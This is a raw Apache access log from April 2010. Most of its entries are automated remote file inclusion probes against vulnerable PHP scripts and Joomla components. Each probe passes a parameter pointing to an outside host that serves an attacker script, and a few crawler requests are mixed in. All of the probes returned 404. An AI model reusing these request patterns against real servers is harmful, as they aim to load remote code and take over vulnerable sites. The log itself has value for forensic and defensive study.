92.48.73.232 - - [09/Apr/2010:01:35:25 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
92.48.73.232 - - [09/Apr/2010:01:35:25 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.149.241.209 - - [09/Apr/2010:01:35:26 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
89.149.241.209 - - [09/Apr/2010:01:35:26 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.149.241.209 - - [09/Apr/2010:01:35:26 -0500] "GET /logs/access_log.1216512000//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:35:26 -0500] "GET /logs/access_log.1219708800/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.163.85.40 - - [09/Apr/2010:01:35:32 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.834"
213.163.85.40 - - [09/Apr/2010:01:35:33 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.834"
213.163.85.40 - - [09/Apr/2010:01:35:33 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.834"
79.98.23.9 - - [09/Apr/2010:01:35:46 -0500] "GET /logs/access_log.1220054400/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
217.23.8.91 - - [09/Apr/2010:01:35:59 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.831"
217.23.8.91 - - [09/Apr/2010:01:35:59 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
217.23.8.91 - - [09/Apr/2010:01:36:00 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
82.141.129.16 - - [09/Apr/2010:01:36:09 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
82.141.129.16 - - [09/Apr/2010:01:36:09 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
82.141.129.16 - - [09/Apr/2010:01:36:09 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
79.98.23.9 - - [09/Apr/2010:01:36:34 -0500] "GET /logs/access_log.1219708800/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:36:34 -0500] "GET /phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:36:34 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
94.136.59.102 - - [09/Apr/2010:01:36:38 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
94.136.59.102 - - [09/Apr/2010:01:36:38 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
94.136.59.102 - - [09/Apr/2010:01:36:38 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
79.98.23.9 - - [09/Apr/2010:01:37:24 -0500] "GET /logs/access_log.1219449600/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:37:51 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:37:51 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:37:52 -0500] "GET /logs/access_log.1221004800//skins/advanced/advanced1.php?pluginpath[0]=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
79.98.23.9 - - [09/Apr/2010:01:38:01 -0500] "GET /logs/access_log.1219449600%20%20/phphtml.php?htmlclass_path=http://kucing10.fileave.com/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:01:38:20 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:38:20 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
206.225.20.146 - - [09/Apr/2010:01:38:26 -0500] "GET /logs/access_log.1221004800//skins/advanced/advanced1.php?pluginpath[0]=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:38:26 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:38:26 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
70.98.34.37 - - [09/Apr/2010:01:39:19 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
70.98.34.37 - - [09/Apr/2010:01:39:19 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
70.98.34.37 - - [09/Apr/2010:01:39:19 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
206.225.20.146 - - [09/Apr/2010:01:39:24 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:39:25 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:39:25 -0500] "GET /logs/access_log.1219449600%20%20//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:39:35 -0500] "GET /logs/access_log.1268956800%20%20//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:39:36 -0500] "GET /logs/access_log.1219708800%20%20//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:39:36 -0500] "GET //plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:39:36 -0500] "GET /logs//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.129.119.43 - - [09/Apr/2010:01:39:46 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
206.225.20.146 - - [09/Apr/2010:01:40:10 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:40:10 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:40:11 -0500] "GET /logs/access_log.1219449600//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:40:32 -0500] "GET /logs/access_log.1268956800//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:41:00 -0500] "GET /logs/access_log.1219449600%20%20//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:41:06 -0500] "GET /logs/access_log.1268956800%20%20//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:01:41:08 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:41:08 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
206.225.20.146 - - [09/Apr/2010:01:42:02 -0500] "GET /logs/access_log.1219449600//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:01:42:03 -0500] "GET /logs/access_log.1268956800//bemarket/postscript/postscript.php?p_mode=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
207.46.204.238 - - [09/Apr/2010:01:42:28 -0500] "GET /logs/access_log.1169164800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:01:42:29 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:42:29 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
128.121.61.35 - - [09/Apr/2010:01:42:50 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.go2play.com.hk/uc/data/avatar/000/00/00/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
128.121.61.35 - - [09/Apr/2010:01:42:50 -0500] "GET /logs/access_log.1220054400%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.go2play.com.hk/uc/data/avatar/000/00/00/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
128.121.61.35 - - [09/Apr/2010:01:42:50 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.go2play.com.hk/uc/data/avatar/000/00/00/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.195.112.180 - - [09/Apr/2010:01:42:50 -0500] "GET /logs/access_log.1226188800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.232.195.131 - - [09/Apr/2010:01:43:04 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
220.232.195.131 - - [09/Apr/2010:01:43:04 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
220.232.195.131 - - [09/Apr/2010:01:43:05 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
94.136.59.102 - - [09/Apr/2010:01:44:04 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.59.102 - - [09/Apr/2010:01:44:05 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.59.102 - - [09/Apr/2010:01:44:05 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
220.232.195.131 - - [09/Apr/2010:01:44:12 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.232.195.131 - - [09/Apr/2010:01:44:12 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.232.195.131 - - [09/Apr/2010:01:44:13 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.235.24.38 - - [09/Apr/2010:01:44:14 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.831"
80.235.24.38 - - [09/Apr/2010:01:44:15 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
80.235.24.38 - - [09/Apr/2010:01:44:15 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
222.122.197.37 - - [09/Apr/2010:01:44:57 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:44:57 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.188.17.18 - - [09/Apr/2010:01:45:13 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
218.188.17.18 - - [09/Apr/2010:01:45:14 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
218.188.17.18 - - [09/Apr/2010:01:45:14 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
222.122.197.37 - - [09/Apr/2010:01:47:31 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:47:32 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
82.141.129.16 - - [09/Apr/2010:01:48:05 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
82.141.129.16 - - [09/Apr/2010:01:48:06 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.141.129.16 - - [09/Apr/2010:01:48:06 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.251.225.101 - - [09/Apr/2010:01:48:11 -0500] "GET //plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:48:11 -0500] "GET /logs/access_log.1219708800%20%20//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:48:14 -0500] "GET /logs//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.250.255.243 - - [09/Apr/2010:01:50:38 -0500] "GET /logs/access_log.1268265600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
203.251.225.101 - - [09/Apr/2010:01:51:58 -0500] "GET /setup.php?dir=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:51:58 -0500] "GET /logs/setup.php?dir=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:51:58 -0500] "GET /logs/access_log.1263859200/setup.php?dir=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:01:51:58 -0500] "GET /logs/access_log.1262736000/setup.php?dir=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.188.17.18 - - [09/Apr/2010:01:52:09 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
218.188.17.18 - - [09/Apr/2010:01:52:09 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.188.17.18 - - [09/Apr/2010:01:52:10 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
222.122.197.37 - - [09/Apr/2010:01:52:10 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:52:10 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:52:35 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:52:35 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
203.251.225.101 - - [09/Apr/2010:01:54:30 -0500] "GET /logs/access_log.1218067200//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:01:55:30 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:55:30 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:57:12 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:01:57:12 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
189.78.160.75 - - [09/Apr/2010:01:58:27 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.203.180.144 - - [09/Apr/2010:01:59:31 -0500] "GET /logs/access_log.1214784000%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:59:31 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:59:31 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:59:31 -0500] "GET /logs/access_log.1214784000%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:59:31 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:01:59:31 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
80.235.24.38 - - [09/Apr/2010:01:59:44 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
80.235.24.38 - - [09/Apr/2010:01:59:45 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.235.24.38 - - [09/Apr/2010:01:59:45 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
211.203.180.144 - - [09/Apr/2010:02:00:41 -0500] "GET /logs/access_log.1219449600%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.203.180.144 - - [09/Apr/2010:02:00:41 -0500] "GET /logs/access_log.1219449600%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://www.langekunstnacht.de/cms/templates/lkn09/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:02:00:56 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:00:56 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.163.85.40 - - [09/Apr/2010:02:01:42 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.834"
213.163.85.40 - - [09/Apr/2010:02:01:42 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.834"
213.163.85.40 - - [09/Apr/2010:02:01:42 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.834"
118.217.216.132 - - [09/Apr/2010:02:06:00 -0500] "GET //plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [09/Apr/2010:02:06:00 -0500] "GET /logs//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.217.216.132 - - [09/Apr/2010:02:06:00 -0500] "GET /logs/access_log.1218067200%20%20//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.howtolisten.kr/lct/exam3/111/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.46.204.192 - - [09/Apr/2010:02:06:28 -0500] "GET /logs/access_log.1175040000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.47 - - [09/Apr/2010:02:06:59 -0500] "GET /logs/access_log.1212796800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:02:07:53 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:07:53 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
118.217.216.132 - - [09/Apr/2010:02:11:10 -0500] "GET //plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.217.216.132 - - [09/Apr/2010:02:11:10 -0500] "GET /logs//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
118.217.216.132 - - [09/Apr/2010:02:11:11 -0500] "GET /logs/access_log.1218067200%20%20//plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:02:12:24 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
